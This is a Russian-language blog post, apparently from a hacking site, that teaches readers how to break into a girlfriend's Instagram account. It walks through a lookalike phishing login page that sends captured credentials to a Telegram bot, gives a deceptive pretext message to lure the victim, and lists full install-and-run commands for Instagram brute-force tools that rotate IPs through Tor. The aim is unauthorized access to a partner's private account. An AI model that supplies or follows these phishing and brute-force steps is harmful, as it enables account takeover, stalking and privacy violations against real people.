November 26, 2020

Взлом Instagram

Салют, Аноним!
За последние дни в мою личку прилетело множество однотипных сообщений примерно такого содержания: "Привет, Голден. Расскажи, как я могу получить доступ к инсте своей девушки? Выручай"

Рассказываю о всех возможных способах. Погнали!

Способ 1. Фишинг

Злобный брат-близнец

Вот так выглядит страница авторизации через ПК. Не идеально, есть небольшие недочеты, которые начинают бросаться в глаза лишь после целенаправленного сравнения с оригиналом. Думаю, далеко не каждый заметит разницу, особенно если открывать сайт с мобильных устройств.

На яблоке сайт действительно крайне похож на оригинал, скрин которого ниже.

Ладно. Суть достаточного сходства я донес. Возникает вопрос - куда будут приходить логин и пароль жертвы? В горячо любимый телеграмчик, а именно, в бота.

Приятно, что перед отправкой боту логин и пароль проверяются. Если первое или второе не верно (не получается авторизовать пользователя), то жертва получает сообщение о некорректности.

С функционалом думаю понятно.

Техническая часть

Так, для начала давайте определимся с тем, что нам необходимо, чтобы все это корректно работало.

Логично, что в первую очередь стоит позаботиться о домене и хостинге. Про то, как заливать сайты на хостинг вам расскажет Google.

Детальнее остановимся на домене. Фишинг сам по себе от начала и до конца построен на захвате доверия жертвы (а это в чистом виде СИ). Вопросы манипуляций тут затрагивать я не буду, опишу лишь минимально необходимое для отработки сценария "Зайди в инсту подруги и поройся в ее грязном белье".

Согласитесь, даже самая упоротая блондинка заметит подвох, если ей скинуть ссылку вроде https://vzlomtvoyeyzhopy.com и сказать, что это инстаграм. Поэтому заходим на любой сайт для проверки занятых доменов и ищем то, что меньше всего отличается от оригинала.

Допустим, вы подобрали что-то подходящее, залили файлы на хостинг, привязали домен. Сайт полностью функционирует и готов разрушать отношения неожиданными открытиями. Переходим к следующему пункту.

Фишинг в большинстве случаев подразумевает контакт в жертвой. Так, как мы рассматриваем взлом вашей подруги, то, предположим, что у нее уже есть к вам определенная степень доверия. В таком случае, можно воспользоваться просто замечательной локальной фичей ТГ - маскировка ссылок в слова.

При нажатии будет перекидывать на фишинг

Предлогом для того, чтобы она авторизовалась может послужить банальное:

Привет. Я чет не могу зайти в [замаскированная ссылка] через браузер. У тебя тоже не работает? Срочно надо ответить в директе, а тут такая беда...

Если у вас хорошо работает воображение, то вы точно придумаете повод, для авторизации по вашей ссылке.

Хорошо. Подруга повелась и слила лог:пас, но как теперь его принять? Как я писал выше, получение чувствительных данных реализовано при помощи бота в тг. Я бы был не я, не продемонстрируй, как его создать и подключить к фишингу.

Создание и настройка бота

1) Идем к отцу всех ботов - @BotFather и слезно просим его создать сыночка, отправляя:

/newbot

2) Придумываем название боту. У меня это vzlom podrugi.

3) Прописываем нашему боту линк. Мой выбор пал, как вы уже, наверное, поняли на vzlompodrugi_bot (приписка _bot обязательна).

В итоге общение с "отцом" выглядит так:

Токен я замазал от греха подальше

4) Копируем токен - то, что я замазал на скриншоте и идем в файлы фишинга. Нас будет интересовать содержимое файла, который я выделил на скрине ниже.

5) Вставляем в поле 'token', то, что вы получили от отца ботов (токен, как не странно).

Токен должен находиться в одинарных ковычках (ну а кто вас знает, вдруг решите и их удалить)

6) Возвращаемся к отцу ботов, жмякаем на линк своего бота и запускаем его командой:

/start


Профит! Теперь логи будут приходить прямиком к нему. Только помните, что сначала нужно все настроить, а только потом уже пытаться наебать свою подружку.


Cпособ 2. Bruteforce

Метод перебора пароля

Instashell - это скрипт для выполнения брутфорс атак на сервис Instagram, скрипт может обойти ограничения на перебор паролей, поэтому он может тестировать бесконечное количество паролей.

Скрипт использует Android ApkSignature для выполнения аутентификации, дополнительно используется TOR для изменения IP-адреса после блокировки, для продолжения атаки.

Устанавливем компоненты Tor:
apt-get update
apt-get install tor
Установка Instashell в Kali Linux (версия на английском):
git clone https://github.com/thelinuxchoice/instashell
cd instashell
chmod +x instashell.sh


Специальная, русифицированная версия!
git clone https://github.com/XIshArkIX/instashell
cd instashell
chmod +x instashell.sh

Запуск и использование:
./instashell.sh
service tor start

Для запуска перебора необходимо указать имя аккаунта на сервисе и словарь, по умолчанию используется словарь Instashell, его можно дополнить или заменить (как у нас на скрине)

Скрипт успешно отрабатывает, предоставляя валидный пароль от аккаунта.

В системе обязательно должен быть установлен TOR!


А с телефона можно? Можно!

Реализация способа 2 со смартфона

Для начала нам понадобится установить и запустить Termux.

Наш инструмент называется IGHACK. Приступим к его установке:

Обновляем пакеты:

apt update

apt upgrade

Скачиваем Python:

pkg install python -y

Скачиваем Python2:

pkg install python2 -y

Скачиваем гит:

pkg install git -y

Клонируем репозиторий:

git clone https://github.com/noob-hackers/ighack

Открываем инструмент:

cd $HOME

ls

cd ighack

ls

bash setup

bash ighack.sh

Перед нами открывается 5 опций:

auto attack - автоматическая брутфорс атака, с паролями по умолчанию

manual attack - брутфорс атака вручную, с вашим листом паролей

about - описание утилиты

update - обновление (рекомендую выбрать перед запуском)

exit - выход из инструмента


А есть еще способы взлома?


Есть, но все они труднее в реализации и требуют определенных навыков.
Получить эти навыки вы можете в нашей Академии Хакинга, набор в которую стартует совсем скоро.

HACKERPLACE.ORG